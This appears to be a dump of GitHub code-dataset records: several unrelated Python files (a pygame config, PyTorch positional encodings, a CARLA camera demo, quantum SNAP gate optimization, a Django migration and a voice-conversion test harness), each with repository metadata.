    for breed, sub_breeds in breeds.items():
        if not sub_breeds:
            # No sub-breeds: the breed name stands on its own.
            print(f"{breed}")
        else:
            for sub_breed in sub_breeds:
                print(f"{sub_breed}-{breed}")
if __name__ == "__main__":
    # get_breed_sub_breed_full_name() fetches the API itself, so the previous
    # separate (unused) request made here was redundant and has been removed.
    get_breed_sub_breed_full_name()
| Swetha-Vootkuri/PythonSessions | dogs_api/breed_sub_breed_list.py | breed_sub_breed_list.py | py | 859 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 5,
"usage_type": "call"
}
] |
21185857238 | import pygame
from time import time
import os
## DISPLAY OPTIONS
screen_width, screen_height = 1280, 720 # window size in pixels
show_interface = False # show the ranking overlay
ticks_per_second = 60 # number of updates per second
empty_ground_color = (210, 210, 210) # color of an unoccupied land tile
background_color = (73, 200, 255) # color of the void
port_color = (13, 143, 185) # color of ports
map_height = 650 # map height in pixels
## PRELOADING
pygame.font.init()
font = pygame.font.Font("img/Proxima Nova Font.otf", 30)
small_font = pygame.font.Font("img/Proxima Nova Font.otf", 20)
flag_img = pygame.image.load("img/flag.png")
disabled_flag_img = pygame.image.load("img/disabled_flag.png")
# Per-run output folder named after the current Unix timestamp.
folder_name = "result/" + str(int(time())) + "/"
os.mkdir(folder_name)
## VIDEO-EDITING OPTIONS
record_games = True # record videos of the games
edit_when_finished = True # assemble the edit once the recording ends
min_x, max_x, min_y, max_y = 99999, -1, 99999, -1  # NOTE(review): presumably sentinel bounds updated at runtime — confirm against usage
framerate = 30 # frames per second
duration = 60 # game duration, in seconds
result_duration = 5 # how long the winner screen is shown, in seconds
width, height = 1080, 1920 # output video size
source_width, source_height = 1280, 720 # size of the source frames
top_text = "Bataille de terrain" # text displayed at the top of the video
bottom_text = ["Abonnez vous et", "commentez votre", "département pour", "recevoir un boost !"] # text displayed at the bottom of the video
{
"api_name": "pygame.font.init",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "pygame.font",
... |
27029688469 | import torch
import numpy as np
import torch.nn as nn
class PositionalEncoding1D(nn.Module):
    """Fixed sine/cosine positional encoding for 1-D sequences.

    Produces, for each 1-based position, sin(pos * f_k) on the first half of
    the channels and cos(pos * f_k) on the second half, with geometrically
    spaced frequencies f_k = temperature^(-2k / num_pos_feats).
    """

    def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
        super().__init__()
        self.channels = num_pos_feats
        if scale is not None and normalize is False:
            raise ValueError("normalize should be True if scale is passed")
        if scale is None:
            scale = 2 * np.pi
        self.scale = scale
        self.normalize = normalize
        even_dims = torch.arange(0, self.channels, 2).float()
        # Buffer so the frequencies follow the module across devices/dtypes.
        self.register_buffer('inv_freq', 1. / (temperature ** (even_dims / self.channels)))

    def forward(self, tensor):
        """Return a (len, c) encoding matrix for a (len, c) input tensor."""
        if tensor.ndim != 2:
            raise RuntimeError("The input tensor has to be 2D!")
        seq_len, in_channels = tensor.shape
        positions = torch.arange(
            1, seq_len + 1, device=tensor.device).type(self.inv_freq.type())
        if self.normalize:
            eps = 1e-6
            positions = positions / (positions[-1:] + eps) * self.scale
        angles = torch.einsum("i,j->ij", positions, self.inv_freq)
        encoded = torch.cat((angles.sin(), angles.cos()), dim=-1)
        out = torch.zeros((seq_len, self.channels),
                          device=tensor.device).type(tensor.type())
        out[:, :self.channels] = encoded
        # Truncate in case the input has fewer channels than we generate.
        return out[:, :in_channels]
class PositionalEncoding2D(nn.Module):
    """
    Sine/cosine position embedding in the style of "Attention Is All You
    Need", generalized to 2-D feature maps with padding masks.
    """

    def __init__(self, num_pos_feats=64, temperature=10000, normalize=False, scale=None):
        super().__init__()
        self.num_pos_feats = num_pos_feats
        self.temperature = temperature
        self.normalize = normalize
        if scale is not None and normalize is False:
            raise ValueError("normalize should be True if scale is passed")
        self.scale = 2 * np.pi if scale is None else scale

    def forward(self, tensors):
        """*tensors* carries .tensors (b, c, h, w) and a boolean .mask (b, h, w).
        Returns a (b, 2*num_pos_feats, h, w) positional embedding."""
        feats, mask = tensors.tensors, tensors.mask
        assert mask is not None
        valid = ~mask
        # Cumulative counts of valid pixels give 1-based row/column positions.
        y_embed = valid.cumsum(1, dtype=torch.float32)
        x_embed = valid.cumsum(2, dtype=torch.float32)
        if self.normalize:
            eps = 1e-6
            y_embed = (y_embed - 0.5) / (y_embed[:, -1:, :] + eps) * self.scale
            x_embed = (x_embed - 0.5) / (x_embed[:, :, -1:] + eps) * self.scale
        dim_t = torch.arange(self.num_pos_feats, dtype=torch.float32, device=feats.device)
        dim_t = self.temperature ** (2 * torch.div(dim_t, 2, rounding_mode='trunc') / self.num_pos_feats)
        pos_x = x_embed[:, :, :, None] / dim_t
        pos_y = y_embed[:, :, :, None] / dim_t
        # Interleave sin on even channels with cos on odd channels.
        pos_x = torch.stack((pos_x[:, :, :, 0::2].sin(), pos_x[:, :, :, 1::2].cos()), dim=4).flatten(3)
        pos_y = torch.stack((pos_y[:, :, :, 0::2].sin(), pos_y[:, :, :, 1::2].cos()), dim=4).flatten(3)
        return torch.cat((pos_y, pos_x), dim=3).permute(0, 3, 1, 2)
| ViTAE-Transformer/DeepSolo | adet/layers/pos_encoding.py | pos_encoding.py | py | 3,339 | python | en | code | 177 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "torch.arange",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "numpy.pi",
"line_number"... |
35147097028 | import nltk
from functools import lru_cache
from nltk.corpus import stopwords
from nltk.stem.snowball import EnglishStemmer
import re
from bs4 import BeautifulSoup
class Preprocessor:
    """Tokenize, clean, and stem English text for indexing."""

    def __init__(self):
        # Stemming is the most time-consuming part of the indexing process, we attach a lru_cache to the stemmer
        # which will store upto 100000 stemmed forms and reuse them when possible instead of applying the
        # stemming algorithm.
        self.stem = lru_cache(maxsize=100000)(EnglishStemmer().stem)
        self.tokenize = nltk.tokenize.WhitespaceTokenizer().tokenize
        # PERF FIX: build the stop-word set once per instance; previously the
        # list was rebuilt on every call and membership tests were O(n).
        self._stop_words = set(stopwords.words('english'))

    def __call__(self, text):
        """Return the list of lower-cased, stop-word-free, stemmed tokens."""
        text = re.sub(r'[\.\?\!\,\:\;\"]', ' ', text)  # strip punctuation
        text = re.sub(r'<.?p>', '', text)              # drop <p>/</p> tags
        tokens = nltk.tokenize.word_tokenize(text)
        # Keep alphabetic tokens only, in lower case.
        tokens = [token.lower() for token in tokens if token.isalpha()]
        tokens = [token for token in tokens if token not in self._stop_words]
        return [self.stem(token) for token in tokens]
| sidsachan/movie_sentiment | preprocessor.py | preprocessor.py | py | 1,221 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "functools.lru_cache",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "nltk.stem.snowball.EnglishStemmer",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "nltk.tokenize.WhitespaceTokenizer",
"line_number": 15,
"usage_type": "call"
},
... |
15760194327 | import glob
import os
import sys
try:
    # Locate the CARLA Python egg matching the running interpreter version
    # and platform, and put it on sys.path so `import carla` below works.
    sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
        sys.version_info.major,
        sys.version_info.minor,
        'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
    # No matching egg found; fall through and hope carla is importable anyway.
    pass
import carla
import random
import time
import numpy as np
import cv2
IM_WIDTH = 640   # camera image width in pixels
IM_HEIGHT = 480  # camera image height in pixels
def process_img(image, name):
    """Display a CARLA camera frame in a cv2 window named *name*, save every
    20th frame to disk, and return the BGR image normalised to [0, 1]."""
    print("Frame: "+str(image.frame)+", timestamp: "+str(image.timestamp))
    raw = np.array(image.raw_data)
    bgra = raw.reshape((IM_HEIGHT, IM_WIDTH, 4))
    bgr = bgra[:, :, :3]  # drop the alpha channel
    cv2.imshow(name, bgr)
    cv2.waitKey(1)
    if image.frame % 20 == 0:
        image.save_to_disk('_out/%06d.png' % image.frame)
    return bgr/255.0
# Demo: connect to a local CARLA server, spawn an autopilot Tesla with an RGB
# camera attached, stream frames to process_img, and destroy actors on exit.
actor_list = []
try:
    # 0. Set the client and the world
    client = carla.Client('localhost', 2000) # https://carla.readthedocs.io/en/latest/core_world/#client-creation
    client.set_timeout(10)
    world = client.get_world()
    # 1. Choose blueprint for the vehicle
    blueprint_library = world.get_blueprint_library() # https://carla.readthedocs.io/en/latest/core_actors/#blueprints
    vehicle = blueprint_library.find('vehicle.tesla.model3') # vehicle_bp = blueprint_library.filter('model3')[0]
    vehicle.set_attribute('color', '255,0,0')
    print(vehicle)
    # 2. Choose spawn point
    # manually
    # spawn_point = carla.Transform(carla.Location(x=, y=, z=),
    #                               carla.Rotation(pitch=, yaw=, roll=))
    # automatically
    spawn_point_vehicle = random.choice(world.get_map().get_spawn_points())
    print(spawn_point_vehicle)
    # 3. Spawn the vehicles
    # spawn the actor
    actor_vehicle = world.spawn_actor(vehicle, spawn_point_vehicle)
    # set control mode. https://carla.readthedocs.io/en/latest/python_api/#carla.Vehicle
    # vehicle.apply_control(carla.VehicleControl(throttle=0.1, steer=0.0))
    actor_vehicle.set_autopilot(True)  # if you just wanted some NPCs to drive.
    # append to the actor_list
    actor_list.append(actor_vehicle)
    # 4. Get the blueprint for this sensor: https://carla.readthedocs.io/en/latest/core_sensors/
    sensor = blueprint_library.find('sensor.camera.rgb')
    # Change the dimensions of the image
    sensor.set_attribute('image_size_x', f'{IM_WIDTH}')
    sensor.set_attribute('image_size_y', f'{IM_HEIGHT}')
    sensor.set_attribute('fov', '110')
    # 5. Adjust sensor relative to vehicle
    # choose the relative spawn point (slightly above and behind the hood)
    spawn_point_sensor = carla.Transform(carla.Location(x=2.5, z=1.0), carla.Rotation(pitch=-15))
    print(spawn_point_sensor)
    # spawn the sensor and attach to vehicle.
    actor_sensor = world.spawn_actor(sensor, spawn_point_sensor, attach_to=actor_vehicle)
    # add sensor to list of actors
    actor_list.append(actor_sensor)
    # 6. Process the collected images: https://carla.readthedocs.io/en/latest/core_sensors/#listening
    # Use the data collected by the sensor. The lambda function can be customized
    actor_sensor.listen(lambda data: process_img(data, "camera1"))
    # actor_sensor.listen(lambda image: image.save_to_disk('output/%06d.png' % image.frame))
finally:
    # Always clean up server-side actors, even if setup failed part-way.
    print('destroying actors')
    for actor in actor_list:
        actor.destroy()
    print('done.')
{
"api_name": "sys.path.append",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "glob.glob",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "sys.version_info",
"line_num... |
41230462018 | import numpy as np
import matplotlib.pyplot as plt
from pathlib import Path
from SnapOptimizer.optimization.snap_optimizer import SNAPGateOptimizer2Qubits, SNAPGateOptimizerStatePreparation
from SnapOptimizer.optimization.snap_pulse_optimizer import SNAPPulseOptimizer
import SnapOptimizer.qubit_gates as qubit_gates
from SnapOptimizer.visualize import show_state
from SnapOptimizer.encodings import Encoding
import SnapOptimizer.paths as local_paths
def optimize_SNAP_gates(
    encoding: Encoding, gates: list[str], n_gates: list[int], Ns: list[int], epochs: int, output_folder: Path,
    show_figure: bool = False, c: float = 0.001, averages: int = 1
):
    """
    Automation for the optimization of SNAP gates
    Args:
        encoding: The encoding to use
        gates: The gates to optimize
        n_gates: How many SNAP gates to use to replicate the gate
        Ns: Size of the Hilbert space in the fock basis
        epochs: How many epochs to run the optimization for
        output_folder: folder to save the results to
        show_figure: If True the figures will pop up on screen when they are drawn. Otherwise they will only be saved
        c: Parameter to control the weight of the thetas in the optimization
        averages: Run the same optimization multiple times
    """
    # One shared axis collects the fidelity curves of every run.
    fidelity_fig, fidelity_ax = plt.subplots(1, figsize=(8, 8))
    for N in Ns:
        code = encoding.get_encoding(N)
        snap_op = SNAPGateOptimizer2Qubits(code, c=c)
        for gate_name in gates:
            # Gates are looked up by upper-cased name in the qubit_gates module.
            gate = getattr(qubit_gates, gate_name.upper(), None)
            if gate is None:
                print(f"The gate {gate_name} is not defined. Check your spelling and try again")
                continue
            for n in n_gates:
                for i in range(averages):
                    # With averages > 1 each repetition gets its own suffix.
                    if averages == 1:
                        save_to = output_folder / f"{gate_name}-{n}-gates-{N}-fockstates"
                    else:
                        save_to = output_folder / f"{gate_name}-{n}-gates-{N}-fockstates_{i+1}"
                    alphas, thetas, _, fidelities = snap_op.optimize_gates(gate, n, epochs, output_folder=save_to)
                    # Generate figures
                    fidelity_ax.plot(range(epochs), fidelities, label=f"{gate_name} {n} gates {N} fock")
                    fig, axs = plt.subplots(2, 4, figsize=(16, 8))
                    # NOTE(review): this `i` shadows the averages-loop variable;
                    # harmless because save_to was computed above, but renaming
                    # one of them would be safer.
                    for i, qubit_state in enumerate(['L00', 'L01', 'L10', 'L11']):
                        logic_state = getattr(snap_op, qubit_state)
                        evolved_state = snap_op.snap_gate(alphas, thetas, logic_state)
                        expected_state = snap_op.transform_gate(gate) @ logic_state
                        # Top row: evolved states; bottom row: targets.
                        show_state(evolved_state, ax=axs[0][i], title=f"Gate on {qubit_state}")
                        show_state(expected_state, ax=axs[1][i], title="")
                    fig.savefig(save_to / 'wigner_plots.png', dpi=150)
                    if show_figure:
                        plt.show()
                    plt.close(fig)
    # Figure over the fidelities
    fidelity_ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))
    fidelity_fig.tight_layout()
    fidelity_ax.set_ylabel("Fidelity")
    fidelity_ax.set_xlabel("Epoch")
    fidelity_ax.set_ylim([0, 1.1])
    filename = output_folder / 'fidelity_plot.png'
    # Handle the possibility of the image already existing. (Multiple processes running the optimization)
    counter = 1
    while filename.exists():
        filename = output_folder / f'fidelity_plot_{counter}.png'
        counter += 1
    fidelity_fig.savefig(filename, dpi=150)
    if show_figure:
        plt.show()
def optimize_SNAP_gates_for_state_preparation(state: np.ndarray, n: int, N: int, epochs: int = 2000, output_folder: Path = None):
    """Optimize *n* SNAP gates taking the cavity ground state to *state*,
    then plot the evolved vs. target state and the fidelity history."""
    optimizer = SNAPGateOptimizerStatePreparation(N=N)
    # The cavity vacuum |0> in the N-dimensional Fock basis.
    vacuum = np.zeros((N, 1))
    vacuum[0, 0] = 1
    alphas, thetas, cost, fidelities = optimizer.optimize_gates(
        state, n_gates=n, epochs=epochs, output_folder=output_folder)
    _, (left_ax, right_ax) = plt.subplots(1, 2)
    fig, fid_ax = plt.subplots(1)
    evolved = optimizer.snap_gate(alphas, thetas, vacuum)
    show_state(evolved, ax=left_ax, title=f"Evolved ground state")
    show_state(state, ax=right_ax, title="Target state")
    fid_ax.plot(range(len(fidelities)), fidelities)
    plt.show()
def optimize_SNAP_pulses(alphas: np.ndarray, thetas: np.ndarray, output_folder: Path = None):
    """Optimize control pulses realizing the given SNAP gate parameters."""
    two_pi = 2 * np.pi
    # Hardware constants below are in Hz (angular frequencies via two_pi).
    optimizer = SNAPPulseOptimizer(
        dim_c=thetas.shape[-1],
        dim_t=2,
        delta=-2.574749e6,
        xi=-two_pi * 2.217306e6,
        xip=-two_pi * 0.013763e6,
        K=-two_pi * 0.002692e6,
        alpha=0,
        wt=0,
        wc=0,
        max_rabi_rate=two_pi * 20e6,
        cutoff_frequency=two_pi * 30e6,
        num_drives=1
    )
    optimizer.optimize_gate_pulses(thetas, alphas, 0.7e-6, output_folder=output_folder)
if __name__ == '__main__':
    # Prepare the single-photon Fock state |1> with one SNAP gate.
    output_folder = local_paths.data('fock_1')
    N = 12       # Fock-space truncation
    n = 1        # number of SNAP gates
    epochs = 3000
    # CONSISTENCY FIX: the state dimension was hard-coded as (12, 1);
    # tie it to N so changing N cannot silently desynchronize the two.
    fock1 = np.zeros((N, 1))
    fock1[1, :] = 1
    print(fock1)
    optimize_SNAP_gates_for_state_preparation(fock1, n, N, epochs=epochs, output_folder=output_folder)
| Paulsson99/SnapOptimizer | SnapOptimizer/optimization/automation.py | automation.py | py | 5,537 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "SnapOptimizer.encodings.Encoding",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 31,
"usage_type": "call"
},
{
"api_name... |
28508158291 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Auto-generated migration: adds the LinkCategory and WebLink models,
    with WebLink holding a foreign key to its LinkCategory."""
    dependencies = [
        ('home', '0019_auto_20150312_1008'),
    ]
    operations = [
        migrations.CreateModel(
            name='LinkCategory',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),
                ('name', models.CharField(max_length=200)),
                ('description', models.TextField(default=None, blank=True, null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='WebLink',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, verbose_name='ID', auto_created=True)),
                ('name', models.CharField(max_length=200)),
                ('url', models.URLField()),
                ('category', models.ForeignKey(to='home.LinkCategory')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
    ]
| micahlagrange/rmlsa.com | rmlsa/home/migrations/0020_linkcategory_weblink.py | 0020_linkcategory_weblink.py | py | 1,164 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.db.migrations.Migration",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "django.db.migrations",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.db.migrations.CreateModel",
"line_number": 14,
"usage_type": "call"
},
... |
35478284383 | import os
import glob
import h5py
import json
import copy
import torch
import librosa
import numpy as np
import soundfile as sf
import speech_recognition as sr
from jiwer import wer
from tqdm import tqdm
from scipy import signal
from trainer import Trainer
from hps.hps import hp, Hps
from torch.autograd import Variable
from preprocess import get_spectrograms
from model.tacotron.text.symbols import symbols
############
# CONSTANT #
############
# Minimum number of spectrogram frames a segment must have before it is fed
# through the model (raised to hp.seg_len in get_trainer for gumbel_t encoders).
MIN_LEN = 9
def griffin_lim(spectrogram):  # Applies Griffin-Lim's raw.
    """Iteratively recover phase from a magnitude spectrogram and return the
    reconstructed waveform."""
    def _invert_spectrogram(spec):  # spec: [f, t]
        return librosa.istft(spec, hp.hop_length, win_length=hp.win_length, window="hann")

    estimate = copy.deepcopy(spectrogram)
    for _ in range(hp.n_iter):
        waveform = _invert_spectrogram(estimate)
        rebuilt = librosa.stft(waveform, hp.n_fft, hp.hop_length, win_length=hp.win_length)
        # Keep the target magnitude, adopt the estimated phase.
        phase = rebuilt / np.maximum(1e-8, np.abs(rebuilt))
        estimate = spectrogram * phase
    return np.real(_invert_spectrogram(estimate))
def spectrogram2wav(mag):  # Generate wave file from spectrogram
    """Turn a (t, f) normalized magnitude spectrogram into a float32 waveform."""
    spec = mag.T  # transpose to (f, t)
    spec = (np.clip(spec, 0, 1) * hp.max_db) - hp.max_db + hp.ref_db  # de-normalize
    amplitude = np.power(10.0, spec * 0.05)  # dB scale -> linear amplitude
    wav = griffin_lim(amplitude)  # phase reconstruction
    wav = signal.lfilter([1], [1, -hp.preemphasis], wav)  # de-preemphasis
    trimmed, _ = librosa.effects.trim(wav)  # strip leading/trailing silence
    return trimmed.astype(np.float32)
def synthesis(f0, sp, ap, sr=16000):
    """Synthesize a waveform from WORLD vocoder features (f0, spectral
    envelope, aperiodicity) at sample rate *sr*.

    NOTE(review): `pw` (pyworld) is never imported in this file, so calling
    this raises NameError — add `import pyworld as pw` before use.
    """
    y = pw.synthesize(f0.astype(np.float64), sp.astype(np.float64), ap.astype(np.float64), sr, pw.default_frame_period)
    return y
def convert_x(x, c, trainer, enc_only, verbose=False):
    """Convert one spectrogram *x* toward speaker id *c* with *trainer*;
    return (converted spectrogram, encoder output), both transposed to (t, f)."""
    speaker = Variable(torch.from_numpy(np.array([c]))).cuda()
    batch = torch.from_numpy(np.expand_dims(x, axis=0)).type(torch.FloatTensor)
    converted, enc = trainer.test_step(batch, speaker, enc_only=enc_only, verbose=verbose)
    converted = converted.squeeze(axis=0).transpose((1, 0))
    enc = enc.squeeze(axis=0).transpose((1, 0))
    return converted, enc
def encode_x(x, trainer):
    """Encode one spectrogram *x* and return the encoding transposed to (t, f)."""
    batch = torch.from_numpy(np.expand_dims(x, axis=0)).type(torch.FloatTensor)
    enc = trainer.encoder_test_step(batch)
    return enc.squeeze(axis=0).transpose((1, 0))
def get_trainer(hps_path, model_path, g_mode, enc_mode, clf_path):
    """Build a Trainer from saved hyper-parameters and load its weights."""
    global MIN_LEN
    hps = Hps(hps_path).get_tuple()
    # gumbel_t encoders need whole segments, so raise the minimum input length.
    MIN_LEN = MIN_LEN if hps.enc_mode != 'gumbel_t' else hps.seg_len
    trainer = Trainer(hps, None, g_mode, enc_mode)
    trainer.load_model(model_path, load_model_list=hps.load_model_list, clf_path=clf_path)
    return trainer
def asr(fname):
    """Transcribe the WAV file *fname* using Google's speech recognizer.

    Raises sr.UnknownValueError when the audio cannot be transcribed.
    """
    r = sr.Recognizer()
    # sr.WavFile is a deprecated alias of sr.AudioFile in SpeechRecognition.
    with sr.AudioFile(fname) as source:
        audio = r.listen(source)
        text = r.recognize_google(audio, language='en')
    return text
def compare_asr(s_wav, t_wav):
    """Return (word error rate, character error rate) between the
    transcriptions of the source and converted WAV files.

    Returns (1.0, 1.0) when recognition fails and (-1.0, -1.0) on any
    other error (e.g. network problems reaching the recognizer service).
    """
    try:
        gt = asr(s_wav)
        recog = asr(t_wav)
        # CER is computed by spacing out the characters and reusing wer().
        err_result = (wer(gt, recog),
                      wer(' '.join([c for c in gt if c != ' ']),
                          ' '.join([c for c in recog if c != ' '])))
    except sr.UnknownValueError:
        err_result = (1., 1.)
    except Exception:
        # BUG FIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt and SystemExit.
        err_result = (-1., -1.)
    return err_result
def parse_encodings(encodings):
    """Format each encoding vector as a space-separated string of ints."""
    # The previous enumerate() index was unused.
    return [' '.join(str(int(e)) for e in enc) for enc in encodings]
def write_encodings(path, encodings):
    """Write one space-separated line of integer codes per encoding to *path*.

    Output is identical to the previous per-element loop, but built with
    str.join instead of trailing-space bookkeeping.
    """
    with open(path, 'w') as file:
        for enc in encodings:
            file.write(' '.join(str(int(e)) for e in enc) + '\n')
def convert(trainer,
            seg_len,
            src_speaker_spec,
            src_speaker,
            tar_speaker,
            utt_id,
            speaker2id,
            result_dir,
            enc_only=True,
            save=['wav', 'enc']):
    """Convert one utterance's spectrogram to *tar_speaker*'s voice.

    Long inputs are processed in seg_len-sized fragments and concatenated.
    With a non-empty *save* the wav/encoding files are written under
    result_dir and (wav_path, n_frames) is returned; with save=[] the raw
    (wav_data, encodings) pair is returned instead.

    NOTE(review): `save` is a mutable default argument — safe only because
    it is never mutated here. Also, if save contains 'enc' but not 'wav',
    the `return wav_path, ...` below raises NameError.
    """
    # pad spec to minimum len
    PADDED = False
    if len(src_speaker_spec) < MIN_LEN:
        padding = np.zeros((MIN_LEN - src_speaker_spec.shape[0], src_speaker_spec.shape[1]))
        src_speaker_spec = np.concatenate((src_speaker_spec, padding), axis=0)
        PADDED = True
    if len(src_speaker_spec) <= seg_len:
        converted_results, encodings = convert_x(src_speaker_spec, speaker2id[tar_speaker], trainer, enc_only=enc_only)
        if PADDED:
            encodings = encodings[:MIN_LEN//8] # truncate the encoding of zero paddings
    else:
        converted_results = []
        encodings = []
        for idx in range(0, len(src_speaker_spec), seg_len):
            # NOTE(review): the tail fragment uses [idx:-1], dropping the very
            # last frame — presumably intentional truncation; confirm.
            if idx + (seg_len*2) > len(src_speaker_spec):
                spec_frag = src_speaker_spec[idx:-1]
            else:
                spec_frag = src_speaker_spec[idx:idx+seg_len]
            if len(spec_frag) >= seg_len:
                converted_x, enc = convert_x(spec_frag, speaker2id[tar_speaker], trainer, enc_only=enc_only)
                converted_results.append(converted_x)
                encodings.append(enc)
            elif idx == 0:
                raise RuntimeError('Please check if input is too short!')
        converted_results = np.concatenate(converted_results, axis=0)
        encodings = np.concatenate(encodings, axis=0)
    wav_data = spectrogram2wav(converted_results)
    if len(save) != 0:
        if 'wav' in save:
            wav_path = os.path.join(result_dir, f'{tar_speaker}_{utt_id}.wav')
            sf.write(wav_path, wav_data, hp.sr, 'PCM_16')
        if 'enc' in save:
            enc_path = os.path.join(result_dir, f'{src_speaker}_{utt_id}.txt')
            write_encodings(enc_path, encodings)
        return wav_path, len(converted_results)
    else:
        return wav_data, encodings
def encode(src_speaker_spec, trainer, seg_len, s_speaker=None, utt_id=None, result_dir=None, save=True):
    """Encode one utterance's spectrogram into discrete units.

    Mirrors convert(): short inputs are zero-padded to MIN_LEN (and the
    padding's encoding truncated), long inputs are encoded in seg_len-sized
    fragments. With save=True the result is written to
    result_dir/<s_speaker>_<utt_id>.txt; otherwise the array is returned.
    """
    if save:
        assert result_dir != None
        assert s_speaker != None
        assert utt_id != None
    # pad spec to minimum len
    PADDED = False
    if len(src_speaker_spec) < MIN_LEN:
        padding = np.zeros((MIN_LEN - src_speaker_spec.shape[0], src_speaker_spec.shape[1]))
        src_speaker_spec = np.concatenate((src_speaker_spec, padding), axis=0)
        PADDED = True
    if len(src_speaker_spec) <= seg_len:
        encodings = encode_x(src_speaker_spec, trainer)
        if PADDED:
            encodings = encodings[:MIN_LEN//8] # truncate the encoding of zero paddings
    else:
        encodings = []
        for idx in range(0, len(src_speaker_spec), seg_len):
            # NOTE(review): [idx:-1] drops the very last frame of the tail
            # fragment — same pattern as convert(); confirm it is intentional.
            if idx + (seg_len*2) > len(src_speaker_spec):
                spec_frag = src_speaker_spec[idx:-1]
            else:
                spec_frag = src_speaker_spec[idx:idx+seg_len]
            if len(spec_frag) >= seg_len:
                enc = encode_x(spec_frag, trainer)
                encodings.append(enc)
            elif idx == 0:
                raise RuntimeError('Please check if input is too short!')
        encodings = np.concatenate(encodings, axis=0)
    if save:
        enc_path = os.path.join(result_dir, f"{s_speaker}_{utt_id}.txt")
        write_encodings(enc_path, encodings)
    else:
        return encodings
def test_from_list(trainer, seg_len, synthesis_list, data_path, speaker2id_path, result_dir, enc_only, flag='test', run_asr=False):
    """Resynthesize every (source utt, target speaker) pair in *synthesis_list*.

    Each line of the list looks like '<dir>/<s_id>_<utt_id>... <t_id>'.
    Converted wavs go under result_dir/<flag>/. With run_asr, utterances
    at least 3 s long are also scored with compare_asr() and averaged.
    """
    with open(speaker2id_path, 'r') as f_json:
        speaker2id = json.load(f_json)
    feeds = []
    with open(synthesis_list, 'r') as f:
        file = f.readlines()
        for line in file:
            line = line.split('\n')[0].split(' ')
            feeds.append({'s_id' : line[0].split('/')[1].split('_')[0],
                          'utt_id' : line[0].split('/')[1].split('_')[1],
                          't_id' : line[1], })
    print('[Tester] - Number of files to be resynthesize: ', len(feeds))
    dir_path = os.path.join(result_dir, f'{flag}/')
    os.makedirs(dir_path, exist_ok=True)
    err_results = []
    with h5py.File(data_path, 'r') as f_h5:
        for feed in tqdm(feeds):
            # convert() with save=['wav'] returns (wav_path, n_frames), so
            # conv_audio is a file path — which is what compare_asr() expects.
            conv_audio, n_frames = convert(trainer,
                                           seg_len,
                                           src_speaker_spec=f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()],
                                           src_speaker=feed['s_id'],
                                           tar_speaker=feed['t_id'],
                                           utt_id=feed['utt_id'],
                                           speaker2id=speaker2id,
                                           result_dir=dir_path,
                                           enc_only=enc_only,
                                           save=['wav'])
            # NOTE(review): this overwrites the n_frames convert() returned
            # with the source utterance's frame count.
            n_frames = len(f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()])
            if run_asr:
                # Only score utterances at least 3 seconds long.
                if hp.frame_shift * (n_frames - 1) + hp.frame_length >= 3.0:
                    orig_audio = spectrogram2wav(f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()])
                    sf.write('orig_audio.wav', orig_audio, hp.sr, 'PCM_16')
                    err_results.append(compare_asr(s_wav='orig_audio.wav', t_wav=conv_audio))
                    os.remove(path='orig_audio.wav')
    if run_asr:
        err_mean = np.mean(err_results, axis=0)
        print('WERR: {:.3f} CERR: {:.3f}, computed over {} samples'.format(err_mean[0], err_mean[1], len(err_results)))
def cross_test(trainer, seg_len, data_path, speaker2id_path, result_dir, enc_only, flag):
    """Convert every test utterance of each source speaker into every target
    speaker's voice, writing wavs under result_dir/<src>_to_<tar>/.

    *flag* selects which split provides the source speakers ('test' or
    'train'); target speakers are always the 'V*' training speakers.
    """
    with h5py.File(data_path, 'r') as f_h5:
        with open(speaker2id_path, 'r') as f_json:
            speaker2id = json.load(f_json)
        if flag == 'test':
            source_speakers = sorted(list(f_h5['test'].keys()))
        elif flag == 'train':
            source_speakers = [s for s in sorted(list(f_h5['train'].keys())) if s[0] == 'S']
        else:
            # ROBUSTNESS: previously an invalid flag crashed later with
            # NameError on source_speakers.
            raise ValueError(f"flag must be 'test' or 'train', got {flag!r}")
        target_speakers = [s for s in sorted(list(f_h5['train'].keys())) if s[0] == 'V']
        print('[Tester] - Testing on the {}ing set...'.format(flag))
        print('[Tester] - Source speakers: %i, Target speakers: %i' % (len(source_speakers), len(target_speakers)))
        print('[Tester] - Converting all testing utterances from source speakers to target speakers, this may take a while...')
        for src_speaker in tqdm(source_speakers):
            for tar_speaker in target_speakers:
                assert src_speaker != tar_speaker
                dir_path = os.path.join(result_dir, f'{src_speaker}_to_{tar_speaker}')
